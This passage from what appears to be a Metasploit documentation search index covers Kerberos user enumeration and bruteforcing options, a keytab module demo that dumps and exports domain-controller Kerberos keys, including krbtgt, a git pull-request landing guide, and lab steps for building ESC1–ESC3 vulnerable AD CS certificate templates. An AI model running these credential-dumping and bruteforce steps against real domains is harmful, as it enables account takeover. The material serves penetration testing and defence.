    "content": "The kerberos_login module only requires the RHOST, DOMAIN and USER_FILE options to run. The DOMAIN option . This option is used to specify the target domain. If the domain name is incorrect an error is returned and domain user account enumeration will fail. An example of setting DOMAIN: . set DOMAIN [domain name] . The USER_FILE option . This option is used to specify the file containing a list of user names to query the Domain Controller to identify if they exist in the target domain or not. One per line. An example of setting USER_FILE: . set USER_FILE [path to file] . The PASS_FILE option . If you happen to manage all the found passwords in a separate file, then this option would be suitable for that. One per line. set PASS_FILE [path to file] . The USERPASS_FILE option . If each user should be using a specific password in your file, then you can use this option. One username/password per line: . set USERPASS_FILE [path to file] . The DB_ALL_CREDS option . This option allows you to reuse all the user names and passwords collected by the database: . set DB_ALL_CREDS true . The DB_ALL_PASS option . This option allows you to reuse all the passwords collected by the database. set DB_ALL_PASS true . The DB_ALL_USERS option . This option allows you to reuse all the user names collected by the database. set DB_ALL_USERS true . The Timeout option . This option is used to specify the TCP timeout i.e. the time to wait before a connection to the Domain Controller is established and data read. An example of setting Timeout: . set Timeout [value in seconds] . ",
    "url": "/docs/pentesting/active-directory/kerberos/kerberos_login.html#options",
    "relUrl": "/docs/pentesting/active-directory/kerberos/kerberos_login.html#options"
  },"519": {
    "doc": "Kerberos login enumeration and bruteforcing",
    "title": "Kerberos login enumeration and bruteforcing",
    "content": " ",
    "url": "/docs/pentesting/active-directory/kerberos/kerberos_login.html",
    "relUrl": "/docs/pentesting/active-directory/kerberos/kerberos_login.html"
  },"520": {
    "doc": "Keytab support and decrypting wireshark traffic",
    "title": "Keytab",
    "content": "The modules/auxiliary/admin/kerberos/keytab module provides utilities for interacting with MIT keytab files, which can store the hashed passwords of one or more principals. Discovered keytab files can be used to generate Kerberos Ticket Granting Tickets, or bruteforced offline. Keytab files can also be useful for decrypting Kerberos traffic using Wireshark dissectors, including the krbtgt encrypted blobs if the AES256 password hash is used - which is described in more detail below. ",
    "url": "/docs/pentesting/active-directory/kerberos/keytab.html#keytab",
    "relUrl": "/docs/pentesting/active-directory/kerberos/keytab.html#keytab"
  },"521": {
    "doc": "Keytab support and decrypting wireshark traffic",
    "title": "Actions",
    "content": "The following actions are supported: . | LIST - List the entries in the keytab file [Default] | ADD - Add a new entry to the keytab file | EXPORT - Export known Kerberos encryption keys from the database | . ",
    "url": "/docs/pentesting/active-directory/kerberos/keytab.html#actions",
    "relUrl": "/docs/pentesting/active-directory/kerberos/keytab.html#actions"
  },"522": {
    "doc": "Keytab support and decrypting wireshark traffic",
    "title": "Scenarios",
    "content": "List . msf6 auxiliary(admin/kerberos/keytab) > run keytab_file=./example.keytab Keytab entries ============== kvno type principal hash date ---- ---- --------- ---- ---- 1 18 (AES256) [email protected] 56c3bf6629871a4e4b8ec894f37489e823bbaecc2a0a4a5749731afa9d158e01 1970-01-01 01:00:00 +0100 [*] Auxiliary module execution completed . Add . Adding an entry using a known password hash/key which has been extracted from a Domain Controller - for instance by using the auxiliary/gather/windows_secrets_dump module: . msf6 auxiliary(admin/kerberos/keytab) > run action=ADD keytab_file=./example.keytab principal=krbtgt realm=DEMO.LOCAL enctype=AES256 key=e1c5500ffb883e713288d8037651821b9ecb0dfad89e01d1b920fe136879e33c [*] modifying existing keytab [+] keytab entry added to ./example.keytab . Adding entries using a specified password: . msf6 auxiliary(admin/kerberos/keytab) > run action=ADD keytab_file=./example.keytab principal=Administrator realm=DEMO.LOCAL enctype=ALL password=p4$$w0rd [*] modifying existing keytab [*] Generating key with salt: DEMO.LOCALAdministrator. The SALT option can be set manually [+] keytab entry added to ./example.keytab . Export . Export Kerberos encryption keys stored in the Metasploit database to a keytab file. This functionality is useful in conjunction with secrets dump . # Secrets dump msf6 > use auxiliary/gather/windows_secrets_dump msf6 auxiliary(gather/windows_secrets_dump) > run smbuser=Administrator smbpass=p4$$w0rd rhosts=192.168.123.13 ... omitted ... 
# Kerberos keys: Administrator:aes256-cts-hmac-sha1-96:56c3bf6629871a4e4b8ec894f37489e823bbaecc2a0a4a5749731afa9d158e01 Administrator:aes128-cts-hmac-sha1-96:df990c21c4e8ea502efbbca3aae435ea Administrator:des-cbc-md5:ad49d9d92f5da170 Administrator:des-cbc-crc:ad49d9d92f5da170 krbtgt:aes256-cts-hmac-sha1-96:e1c5500ffb883e713288d8037651821b9ecb0dfad89e01d1b920fe136879e33c krbtgt:aes128-cts-hmac-sha1-96:ba87b2bc064673da39f40d37f9daa9da krbtgt:des-cbc-md5:3ddf2f627c4cbcdc ... omitted ... [*] Auxiliary module execution completed # Export to keytab msf6 auxiliary(gather/windows_secrets_dump) > use admin/kerberos/keytab msf6 auxiliary(admin/kerberos/keytab) > run action=EXPORT keytab_file=./example.keytab [+] keytab saved to ./example.keytab Keytab entries ============== kvno type principal hash date ---- ---- --------- ---- ---- 1 1 (DES_CBC_CRC) [email protected] 3e5d83fe4594f261 1970-01-01 01:00:00 +0100 1 17 (AES128) ADF3\\[email protected] 967ccd1ffb9bff7900464b6ea383ee5b 1970-01-01 01:00:00 +0100 1 3 (DES_CBC_MD5) ADF3\\[email protected] 62336164643537303830373630643133 1970-01-01 01:00:00 +0100 1 18 (AES256) [email protected] 56c3bf6629871a4e4b8ec894f37489e823bbaecc2a0a4a5749731afa9d158e01 1970-01-01 01:00:00 +0100 1 17 (AES128) [email protected] df990c21c4e8ea502efbbca3aae435ea 1970-01-01 01:00:00 +0100 1 3 (DES_CBC_MD5) [email protected] ad49d9d92f5da170 1970-01-01 01:00:00 +0100 1 1 (DES_CBC_CRC) [email protected] ad49d9d92f5da170 1970-01-01 01:00:00 +0100 1 18 (AES256) [email protected] e1c5500ffb883e713288d8037651821b9ecb0dfad89e01d1b920fe136879e33c 1970-01-01 01:00:00 +0100 1 17 (AES128) [email protected] ba87b2bc064673da39f40d37f9daa9da 1970-01-01 01:00:00 +0100 1 3 (DES_CBC_MD5) [email protected] 3ddf2f627c4cbcdc 1970-01-01 01:00:00 +0100 ... omitted ... [*] Auxiliary module execution completed . Decrypting Kerberos traffic in wireshark . 
The Kerberos protocol makes use of encrypted values which will show as an opaque blob of hex characters in Wireshark. Configuring Wireshark with a Keytab file can decrypt these values automatically. For instance in a TGS-REQ request within Wireshark, the cipher below is encrypted using the user account’s password and is not human readable: . tgs-req pvno: 5 msg-type: krb-tgs-req (12) padata: 1 item PA-DATA pA-TGS-REQ padata-type: pA-TGS-REQ (1) padata-value: 6e82044730820443a003020105a10302010ea20703050000000000a38203c6618203c230… ap-req pvno: 5 msg-type: krb-ap-req (14) Padding: 0 ap-options: 00000000 ticket authenticator etype: eTYPE-ARCFOUR-HMAC-MD5 (23) cipher: 0bbb6dbc29413df5905d45c97a3d05239bd609326ff4a410f47048c3f4e22c3ea8003985… ^^^^^^^^^^^^^^ Value encrypted using the user account's password . The easiest way to decrypt these opaque blobs is to generate a Keytab file with Metasploit using the secretsdump scenario above or similar. After generating a keytab file, in the Wireshark GUI go to Edit -> Preferences -> Protocols -> KRB5 and modify the following options: . | Set try to decrypt Kerberos blobs to true | Set the Kerberos keytab file to the keytab file generated from your domain controller | . After confirming the new settings, the previously encrypted values which were signed with the user’s password, and the decryptable session key, should be viewable in Wireshark. For example the previous TGS-REQ authenticator blob is now decrypted in the Wireshark UI. Wireshark on Linux may not show the decrypted packet information in the packet details pane; instead it appears as a separate tab in the packet bytes pane: . 
tgs-req pvno: 5 msg-type: krb-tgs-req (12) padata: 1 item PA-DATA pA-TGS-REQ padata-type: pA-TGS-REQ (1) padata-value: 6e82044730820443a003020105a10302010ea20703050000000000a38203c6618203c230… ap-req pvno: 5 msg-type: krb-ap-req (14) Padding: 0 ap-options: 00000000 ticket authenticator etype: eTYPE-ARCFOUR-HMAC-MD5 (23) cipher: 0bbb6dbc29413df5905d45c97a3d05239bd609326ff4a410f47048c3f4e22c3ea8003985… Decrypted keytype 23 usage 7 using learnt encASRepPart_key in frame 475 (id=475.1 same=0) (f161f360...) # ... authenticator authenticator-vno: 5 crealm: ADF3.LOCAL cname name-type: kRB5-NT-PRINCIPAL (1) cname-string: 1 item CNameString: a cusec: 303247 ctime: 2022-04-10 15:21:31 (UTC) ^^^^^^^^^^^^^^ authenticator value now decrypted using the previously generated keytab file . If you have exported the krbtgt account to the keytab file - Wireshark will also decrypt the TGT ticket itself. If not - Wireshark will generate warnings about being unable to decrypt the TGT ticket which is signed using the krbtgt account. Additional details: https://wiki.wireshark.org/Kerberos . If you are on a Windows domain controller it is possible to use the ktpass program to generate keytab files: . ktpass /crypto All /princ [email protected] /pass p4$$w0rd /out demo.keytab /ptype KRB5_NT_PRINCIPAL . It is easier to use the Metasploit module, but if you do use ktpass - be aware of the following issues: . | If the password contains $ it is easier to run the ktpass command in cmd rather than powershell to avoid unexpected variable substitution | If there is a Missing keytype 18 warning for etype: eTYPE-AES256-CTS-HMAC-SHA1-96 (18) in Wireshark - verify that the principal name is correct within the ktpass generation command . | This should match the initial AS-REQ KRB ERROR salt, found in krb-error -> edata -> ETYPE-INFO2-ENTRY -> salt | . | . Common Mistakes . Invalid REALM/PRINCIPAL/SALT . 
When generating a keytab with a password, a salt is generated by default from the principal and realm unless one is explicitly provided. For Windows Active Directory environments, these values are case-sensitive. The realm should be upper case, and the principal is case-sensitive. When the SALT is not explicitly provided a salt will be generated that follows the Windows naming convention, for instance: . REALM.EXAMPLEAdministrator . ",
    "url": "/docs/pentesting/active-directory/kerberos/keytab.html#scenarios",
    "relUrl": "/docs/pentesting/active-directory/kerberos/keytab.html#scenarios"
  },"523": {
    "doc": "Keytab support and decrypting wireshark traffic",
    "title": "Keytab support and decrypting wireshark traffic",
    "content": " ",
    "url": "/docs/pentesting/active-directory/kerberos/keytab.html",
    "relUrl": "/docs/pentesting/active-directory/kerberos/keytab.html"
  },"524": {
    "doc": "Landing Pull Requests",
    "title": "The short story",
    "content": ". | Configure your git environment as described here. | Add the fetch = +refs/pull/*/head:refs/remotes/upstream/pr/* line to your .git/config. | Add your signing key git config --global user.signingkey . | Use gpg --list-keys to view your available keys. Note that on certain systems you may need to replace gpg with gpg2. Sample output can be seen below: . pub rsa4096 2020-04-07 [SC] 3198961E148FF5E527E31A5FD35E05C0F2B81E83 uid [ultimate] Grant Willcox <[email protected]> sub rsa4096 2020-04-07 [E] . | Set the GPG key as your signing key. To set the key shown above as the signing key for all repositories, one would execute: . git config --global user.signingkey 3198961E148FF5E527E31A5FD35E05C0F2B81E83 . | . | When merging code from a pull request, always, always merge -S --no-ff --edit, and write a meaningful 50/72 commit message that references the original PR as #1234 (not PR1234, not PR#1234, not 1234). For example, your message should look like this: . Land #1234, a whizbang bug fix Adds a whiz to the existing bang. It appears that without this, bad things can occasionally happen. Thanks @mcfakepants! Fixes #1024, also see #999. | The -S flag indicates that you’re going to sign the merge with your PGP/GPG key, which is a nice assurance that you’re really you. | The --no-ff flag indicates that you want to create a merge commit no matter what, even if the merge would normally be resolved as a fast-forward. This ensures that all changes have a merge commit associated with them. | The --edit flag will drop you into your default editor (normally vim), and will allow you to edit the commit message so that it conforms to Metasploit standards, rather than sticking with git’s pre-generated commit message which does not. | . | Note that the --no-ff flag should be used both for PRs that go back to a contributor’s branch as well as PRs that land in Metasploit’s master branch. 
| If you’re making changes (often the case), merge to a landing branch, then merge that branch to upstream/master with the -S --no-ff --edit options. | . ",
    "url": "/docs/development/maintainers/process/landing-pull-requests.html#the-short-story",
    "relUrl": "/docs/development/maintainers/process/landing-pull-requests.html#the-short-story"
  },"525": {
    "doc": "Landing Pull Requests",
    "title": "Handy Git aliases",
    "content": "Check out this gist that automates (mostly) landing pull requests, signing the merge commit, all while rarely losing a race with other committers. ",
    "url": "/docs/development/maintainers/process/landing-pull-requests.html#handy-git-aliases",
    "relUrl": "/docs/development/maintainers/process/landing-pull-requests.html#handy-git-aliases"
  },"526": {
    "doc": "Landing Pull Requests",
    "title": "Fork and clone",
    "content": "First, fork and clone the rapid7/metasploit-framework repo, following these instructions. I like using ssh with ~/.ssh/config aliases as described here, but the https method will work, too. Once this is done, you will have a remote repository called “origin,” which points to your forked repository on GitHub. You will be doing most of your work in your own fork of Metasploit, even if you have commit rights to Rapid7’s fork. Now, we’re going to add an “upstream” repository to talk to the Rapid7 repository. In addition, we’re going to add a magical line to the config file that will let us see all pull requests against the Rapid7 repo (both open and closed). Note that this will take a minute since you’re adding some hundreds of megs to your clone’s refs. So, open up metasploit-framework/.git/config with your favorite editor, add an upstream remote, and add the pull request refs for both your and Rapid7’s forks. In the end, you should have a section that started off like this: . [remote \"upstream\"] fetch = +refs/heads/*:refs/remotes/upstream/* fetch = +refs/pull/*/head:refs/remotes/upstream/pr/* url = https://github.com/rapid7/metasploit-framework . And now it looks like this: . [remote \"upstream\"] fetch = +refs/heads/*:refs/remotes/upstream/* fetch = +refs/pull/*/head:refs/remotes/upstream/pr/* url = [email protected]:rapid7/metasploit-framework.git [remote \"origin\"] fetch = +refs/heads/*:refs/remotes/origin/* fetch = +refs/pull/*/head:refs/remotes/origin/pr/* url = https://github.com/YOURNAME/metasploit-framework . Some people like to copy these over into remotes named “rapid7” and “yourusername” just so they don’t have to remember about “origin” and “upstream,” but for this doc, we’ll just assume you have “origin” and “upstream” defined like this. Now, you can git fetch the remote PRs. This will take a little bit, since we have a couple dozen MBs of pull request data. Storage is cheap, though, right? . 
$ git fetch --all Fetching todb-r7 remote: Counting objects: 13, done. remote: Compressing objects: 100% (1/1), done. remote: Total 7 (delta 6), reused 7 (delta 6) Unpacking objects: 100% (7/7), done. From https://github.com/todb-r7/metasploit-framework * [new ref] refs/pull/1/head -> origin/pr/1 * [new ref] refs/pull/2/head -> origin/pr/2 Fetching upstream remote: Counting objects: 91, done. remote: Compressing objects: 100% (29/29), done. remote: Total 59 (delta 47), reused 42 (delta 30) Unpacking objects: 100% (59/59), done. From https://github.com/rapid7/metasploit-framework [... bunches of tags and PRs ...] * [new ref] refs/pull/1701/head -> upstream/pr/1701 * [new ref] refs/pull/1702/head -> upstream/pr/1702 . You can git fetch a remote any time, and you’ll get access to the latest changes to all branches and pull requests. ",
    "url": "/docs/development/maintainers/process/landing-pull-requests.html#fork-and-clone",
    "relUrl": "/docs/development/maintainers/process/landing-pull-requests.html#fork-and-clone"
  },"527": {
    "doc": "Landing Pull Requests",
    "title": "Branching from PRs",
    "content": "A manageable strategy for dealing with outstanding PRs is to start pre-merge testing on the pull request in isolation. For example, to work on PR #1217, we would: . $ git checkout upstream/pr/1217 Note: checking out 'upstream/pr/1217'. You are in 'detached HEAD' state. You can look around, make experimental changes and commit them, and you can discard any commits you make in this state without impacting any branches by performing another checkout. If you want to create a new branch to retain commits you create, you may do so (now or later) by using -b with the checkout command again. Example: git checkout -b new_branch_name HEAD is now at 9e499e5... Make BindTCP test more robust ((no branch)) todb@mazikeen:~/git/rapid7/metasploit-framework . $ git checkout -b landing-1217 . Now, we’re on a local branch identical to the original pull request, and can move on from there. We can make our changes, isolated from master, and then either send them back to the contributor (this requires looking up the original contributor’s GitHub username and branch name on GitHub), or if there aren’t any changes or the changes are trivial, we can land them (if you have committer rights to Rapid7’s repo, this is where you land them to the upstream repo). In this particular case with PR #1217, I did want to send some changes back to the contributor. Important: If the codebase the contributor’s PR is based on is severely outdated (e.g., they branched off an outdated master), you should not test their PR in isolation as described above. Instead, you should create a test branch that is identical to the latest codebase, merge the contributor’s PR into the test branch, and then start your testing. You may need to bundle install to ensure you’re using the right gems. Here’s an example with #6954 (your workflow may vary): . $ git checkout upstream/master Note: checking out 'upstream/master'. You are in 'detached HEAD' state. 
You can look around, make experimental changes and commit them, and you can discard any commits you make in this state without impacting any branches by performing another checkout. If you want to create a new branch to retain commits you create, you may do so (now or later) by using -b with the checkout command again. Example: git checkout -b <new-branch-name> HEAD is now at afbeb2b... Land #7023, fixes for swagger exploit $ git merge --no-ff --no-edit upstream/pr/6954 Merge made by the 'recursive' strategy. modules/exploits/windows/local/payload_inject.rb | 5 +++++ 1 file changed, 5 insertions(+) [*] Running msftidy.rb in .git/hooks/post-merge mode --- Checking new and changed module syntax with tools/dev/msftidy.rb --- modules/exploits/windows/local/payload_inject.rb - msftidy check passed ------------------------------------------------------------------------ . This ensures that the contributor’s PR is being tested against the latest codebase and not an outdated one. If you do not do this, when you land the PR, you may end up breaking Metasploit. Note that the example above will leave you in a detached HEAD state. This is fine if you just want to test the module in question, however if you want to make any changes, don’t forget to make a new branch. For the example above this could be done by running the following command: . git checkout -b land-6954 . ",
    "url": "/docs/development/maintainers/process/landing-pull-requests.html#branching-from-prs",
    "relUrl": "/docs/development/maintainers/process/landing-pull-requests.html#branching-from-prs"
  },"528": {
    "doc": "Landing Pull Requests",
    "title": "Checking out branches from a remote forked repo in your forked repo",
    "content": "After your .git/config is set up per the above, and you successfully run git fetch --all, you are two steps away from being able to check out a branch from a contributor’s forked repo. You need to add their fork once as a remote: git remote add OTHER_USER git://github.com/OTHER_USER/metasploit-framework.git. Now pull down the latest from them: git fetch OTHER_USER. Now you can check out branches from OTHER_USER per usual, e.g. git checkout bug/foo. ",
    "url": "/docs/development/maintainers/process/landing-pull-requests.html#checking-out-branches-from-a-remote-forked-repo-in-your-forked-repo",
    "relUrl": "/docs/development/maintainers/process/landing-pull-requests.html#checking-out-branches-from-a-remote-forked-repo-in-your-forked-repo"
  },"529": {
    "doc": "Landing Pull Requests",
    "title": "Making changes",
    "content": "$ gvim .gitignore [... make some changes and some commits ...] (landing-1217) todb@mazikeen:~/git/rapid7/metasploit-framework $ git checkout -b pr1217-fix-gitignore-conflict Switched to a new branch 'pr1217-fix-gitignore-conflict' (pr1217-fix-gitignore-conflict) todb@mazikeen:~/git/rapid7/metasploit-framework $ git push origin pr1271-fix-gitignore-conflict (pr1217-fix-gitignore-conflict) todb@mazikeen:~/git/rapid7/metasploit-framework $ git pr-url schierlm javapayload-maven Created new window in existing browser session. This sequence does a few things after editing .gitconfig. It creates another copy of landing-1217 (which is itself a copy of upstream/pr/1217). Next, I push those changes to my branch (todb-r7, aka “origin”). Finally, I have a mighty .gitconfig alias here to open a browser window to send a pull request to the original contributor’s branch (you will want to edit yours to reflect your real GitHub username, of course). pr-url = !\"echo https://github.com/YOURNAME/metasploit-framework/pull/new/HISNAME:HISBRANCH...YOURBRANCH\" . Filling in the blanks (provided by the original PR’s information from GitHub) gets me: . https://github.com/todb-r7/metasploit-framework/pull/new/schierlm:javapayload-maven...pr1217-fix-gitignore-conflict . I opened that in a browser, and ended up with https://github.com/schierlm/metasploit-framework/pull/1 . Once @schierlm landed it on his branch (again, using git merge --no-ff and a short, informational merge commit message), all I (or anyone) had to do was git fetch to get the change reflected in upstream/pr/1217, and then the integration of the PR could continue. ",
    "url": "/docs/development/maintainers/process/landing-pull-requests.html#making-changes",
    "relUrl": "/docs/development/maintainers/process/landing-pull-requests.html#making-changes"
  },"530": {
    "doc": "Landing Pull Requests",
    "title": "Collaboration between contributors",
    "content": "Note the important bit here: you do not need commit rights to Rapid7 to branch pull requests. If Alice knows a solution to Bob’s pull request that Juan pointed out, it is easy for Alice to provide that solution by following the procedure above. git blame will still work correctly, commit histories will all be accurate, everyone on the pull request will be notified of Alice’s changes, and Juan doesn’t have to wait around for Bob to figure out how to use send_request_cgi() or whatever the problem was. The hardest part is remembering how to construct the pull request to Bob – lucky for you, this .git/config alias makes that part pretty push-button. ",
    "url": "/docs/development/maintainers/process/landing-pull-requests.html#collaboration-between-contributors",
    "relUrl": "/docs/development/maintainers/process/landing-pull-requests.html#collaboration-between-contributors"
  },"531": {
    "doc": "Landing Pull Requests",
    "title": "Landing to upstream",
    "content": "Back to PR #1217. Turns out, my change was enough to land the original chunk of work. So, someone else (@jlee-r7) was able to do something like this: . $ git fetch upstream remote: Counting objects: 12, done. remote: Compressing objects: 100% (2/2), done. remote: Total 7 (delta 5), reused 7 (delta 5) Unpacking objects: 100% (7/7), done. From https://github.com/rapid7/metasploit-framework 9e499e5..263e967 refs/pull/1651/head -> upstream/pr/1651 . This all looked good, so he could land this to Rapid7’s repo with: . $ git checkout -b upstream-master --track upstream/master $ git merge -S --no-ff --edit landing-1217 $ git push upstream upstream-master:master . Or, if he already has upstream-master checked out: . $ git checkout upstream-master $ git rebase upstream/master $ git merge -S --no-ff --edit landing-1217 $ git push upstream upstream-master:master . The --edit is optional if we have our editor configured correctly in $HOME/.gitconfig. The point here is that we always want a merge commit, and we never want to use the (often useless) default merge commit message. For #1217, this was changed to: . Land #1217, java payload build system refactor . Note that you should rebase before landing – otherwise, your merge commit will be lost in the rebase. Finally, the -S indicates we are going to sign the merge, using our GPG key. This is a nice way to prove in a secure way that this merge is, in fact, coming from you, and not someone impersonating you. For more on signing merges, see A Git Horror Story: Repository Integrity With Signed Commits. To set yourself up for signing, your .gitconfig (or metasploit-framework/git/.config) file should have these entries: . [user] name = Your Name email = [email protected] signingkey = DEADBEEF # Must match exactly with your key for \"Your Name <[email protected]>\" [alias] c = commit -S --edit m = merge -S --no-ff --edit . 
People with commit rights to rapid7/metasploit-framework will have their keys listed here. ",
    "url": "/docs/development/maintainers/process/landing-pull-requests.html#landing-to-upstream",
    "relUrl": "/docs/development/maintainers/process/landing-pull-requests.html#landing-to-upstream"
  },"532": {
    "doc": "Landing Pull Requests",
    "title": "Post-Merge",
    "content": "After a pull request has been merged, release notes should be added to the pull request in the form of a comment. These release notes will automatically be extracted and used as documentation when creating the metasploit release notes. Release note examples: . | 12873 Release notes | 12831 Release notes | . The rn-no-release-notes label must be added if there are no release notes for the merged pull request. ",
    "url": "/docs/development/maintainers/process/landing-pull-requests.html#post-merge",
    "relUrl": "/docs/development/maintainers/process/landing-pull-requests.html#post-merge"
  },"533": {
    "doc": "Landing Pull Requests",
    "title": "Merge conflicts",
    "content": "The nice thing about this strategy is that you can test for merge conflicts straight away. You’d use a sequence like: . git checkout upstream/pr/1234 git checkout -b landing-1234 git checkout master git checkout -b master-temp git merge landing-1234 master-temp . If that works, great, you know you don’t have any merge conflicts right now. ",
    "url": "/docs/development/maintainers/process/landing-pull-requests.html#merge-conflicts",
    "relUrl": "/docs/development/maintainers/process/landing-pull-requests.html#merge-conflicts"
  },"534": {
    "doc": "Landing Pull Requests",
    "title": "Questions and Corrections",
    "content": "Reach out in #contributors on Metasploit Slack, or by e-mailing msfdev at metasploit dot com. ",
    "url": "/docs/development/maintainers/process/landing-pull-requests.html#questions-and-corrections",
    "relUrl": "/docs/development/maintainers/process/landing-pull-requests.html#questions-and-corrections"
  },"535": {
    "doc": "Landing Pull Requests",
    "title": "Landing Pull Requests",
    "content": "This page is meant for Committers. If you are unsure whether you are a committer, you are not. Metasploit is built incrementally by the community through GitHub’s Pull Request mechanism. Submitting pull requests (or PRs) is already discussed in the Dev environment setup documentation. It’s important to realize that PRs are a feature of GitHub, not git, so this document will take a look at how to get your git environment to deal with them sensibly. ",
    "url": "/docs/development/maintainers/process/landing-pull-requests.html",
    "relUrl": "/docs/development/maintainers/process/landing-pull-requests.html"
  },"536": {
    "doc": "Vulnerable cert finder",
    "title": "Vulnerable Application",
    "content": "The auxiliary/gather/ldap_esc_vulnerable_cert_finder module allows users to query a LDAP server for vulnerable certificate templates and will print these certificates out in a table along with which attack they are vulnerable to and the SIDs that can be used to enroll in that certificate template. Additionally the module will also print out a list of known certificate servers along with info about which vulnerable certificate templates the certificate server allows enrollment in and which SIDs are authorized to use that certificate server to perform this enrollment operation. Currently the module is capable of checking for ESC1, ESC2, and ESC3 vulnerable certificates. Installing AD CS . | Install AD CS on either a new or existing domain controller | Open the Server Manager | Select Add roles and features | Select “Active Directory Certificate Services” under the “Server Roles” section | When prompted add all of the features and management tools | On the AD CS “Role Services” tab, leave the default selection of only “Certificate Authority” | Complete the installation and reboot the server | Reopen the Server Manager | Go to the AD CS tab and where it says “Configuration Required”, hit “More” then “Configure Active Directory Certificate…” | Select “Certificate Authority” in the Role Services tab | Keep all of the default settings, noting the “Common name for this CA” value on the “CA Name” tab. | Accept the rest of the default settings and complete the configuration | . Setting up an ESC1 Vulnerable Certificate Template . | Open up the run prompt and type in certsrv. | In the window that appears you should see your list of certification authorities under Certification Authority (Local). | Right click on the folder in the drop down marked Certificate Templates and then click Manage. | Scroll down to the User certificate. Right click on it and select Duplicate Template. 
| From here you can refer to https://github.com/RayRRT/Active-Directory-Certificate-Services-abuse/blob/3da1d59f1b66dd0e381b2371b8fb42d87e2c9f82/ADCS.md for screenshots. | Select the General tab and rename this to something meaningful like ESC1-Template, then click the Apply button. | In the Subject Name tab, select Supply in the request and click Ok on the security warning that appears. | Click the Apply button. | Scroll to the Extensions tab. | Under Application Policies ensure that Client Authentication, Server Authentication, KDC Authentication, or Smart Card Logon is listed. | Click the Apply button. | Under the Security tab make sure that the Domain Users group is listed and the Enroll permission is marked as allowed for this group. | Under the Issuance Requirements tab, ensure that under Require the following for enrollment the CA certificate manager approval box is unticked, as is the This number of authorized signatures box. | Click Apply and then Ok | Go back to the certsrv screen and right click on the Certificate Templates folder. Then click New followed by Certificate Template to Issue. | Scroll down and select the ESC1-Template certificate, or whatever you named the ESC1 template you created, and select OK. The certificate should now be available to be issued by the CA server. | . Setting up an ESC2 Vulnerable Certificate Template . | Open up certsrv | Scroll down to the Certificate Templates folder, right click on it and select Manage. | Find the ESC1 certificate template you created earlier and right click on that, then select Duplicate Template. | Select the General tab, and then name the template ESC2-Template. Then click Apply. | Go to the Subject Name tab and select Build from this Active Directory Information and select Fully distinguished name under the Subject Name Format. The main idea of setting this option is to prevent being able to supply the subject name in the request, as this is largely what makes the certificate vulnerable to ESC1. 
The specific options here should not matter much so long as the Supply in the request option isn’t ticked. Then click Apply. | Go to the Extensions tab and click on Application Policies. Then click on Edit. | Delete all the existing application policies by clicking on them one by one and clicking the Remove button. | Click the Add button and select Any Purpose from the list that appears. Then click the OK button. | Click the Apply button, and then OK. The certificate should now be created. | Go back to the certsrv screen and right click on the Certificate Templates folder. Then click New followed by Certificate Template to Issue. | Scroll down and select the ESC2-Template certificate, or whatever you named the ESC2 template you created, and select OK. The certificate should now be available to be issued by the CA server. | . Setting up an ESC3 Template 1 Vulnerable Certificate Template . | Follow the instructions above to duplicate the ESC2 template and name it ESC3-Template1, then click Apply. | Go to the Extensions tab, click the Application Policies entry, click the Edit button, and remove the Any Purpose policy and replace it with Certificate Request Agent, then click OK. | Click Apply. | Go to the Issuance Requirements tab and double check that both CA certificate manager approval and This number of authorized signatures are unchecked. | Click Apply if any changes were made or the button is not greyed out, then click OK to create the certificate. | Go back to the certsrv screen and right click on the Certificate Templates folder. Then click New followed by Certificate Template to Issue. | Scroll down and select the ESC3-Template1 certificate, or whatever you named the first ESC3 template you just created, and select OK. The certificate should now be available to be issued by the CA server. | . Setting up an ESC3 Template 2 Vulnerable Certificate Template . 
| Follow the instructions above to duplicate the ESC2 template and name it ESC3-Template2, then click Apply. | Go to the Extensions tab, click the Application Policies entry, click the Edit button, and remove the Any Purpose policy and replace it with Client Authentication, then click OK. | Click Apply. | Go to the Issuance Requirements tab and double check that CA certificate manager approval is unchecked. | Check the This number of authorized signatures checkbox and ensure the value specified is 1, that the Policy type required in signature is set to Application Policy, and that the Application policy value is Certificate Request Agent. | Click Apply and then click OK to issue the certificate. | Go back to the certsrv screen and right click on the Certificate Templates folder. | Click New followed by Certificate Template to Issue. | Scroll down and select the ESC3-Template2 certificate, and select OK. | The certificate should now be available to be issued by the CA server. | . ",
    "url": "/docs/pentesting/active-directory/ad-certificates/ldap_esc_vulnerable_cert_finder.html#vulnerable-application",
    "relUrl": "/docs/pentesting/active-directory/ad-certificates/ldap_esc_vulnerable_cert_finder.html#vulnerable-application"
  },"537": {
    "doc": "Vulnerable cert finder",
    "title": "Module usage",
    "content": ". | Do: Start msfconsole | Do: use auxiliary/gather/ldap_esc_vulnerable_cert_finder | Do: set BIND_DN <DOMAIN>\\\\<USERNAME to log in as> | Do: set BIND_PW <PASSWORD FOR USER> | Do: set RHOSTS <target IP(s)> | Optional: set RPORT <target port> if the target port is non-default. | Optional: set SSL true if the target port is SSL enabled. | Do: run | . ",
    "url": "/docs/pentesting/active-directory/ad-certificates/ldap_esc_vulnerable_cert_finder.html#module-usage",
    "relUrl": "/docs/pentesting/active-directory/ad-certificates/ldap_esc_vulnerable_cert_finder.html#module-usage"
  },"538": {
    "doc": "Vulnerable cert finder",
    "title": "Options",
    "content": "REPORT_NONENROLLABLE . If set to True then report any certificate templates that are vulnerable but which are not known to be enrollable. If set to False then skip over these certificate templates and only report on certificate templates that are both vulnerable and enrollable. REPORT_PRIVENROLLABLE . If set to True then report certificate templates that are only enrollable by the Domain and Enterprise Admins groups. If set to False then skip over these certificate templates and only report on certificate templates that are enrollable by at least one additional user or group. ",
    "url": "/docs/pentesting/active-directory/ad-certificates/ldap_esc_vulnerable_cert_finder.html#options",
    "relUrl": "/docs/pentesting/active-directory/ad-certificates/ldap_esc_vulnerable_cert_finder.html#options"
  },"539": {
    "doc": "Vulnerable cert finder",
    "title": "Scenarios",
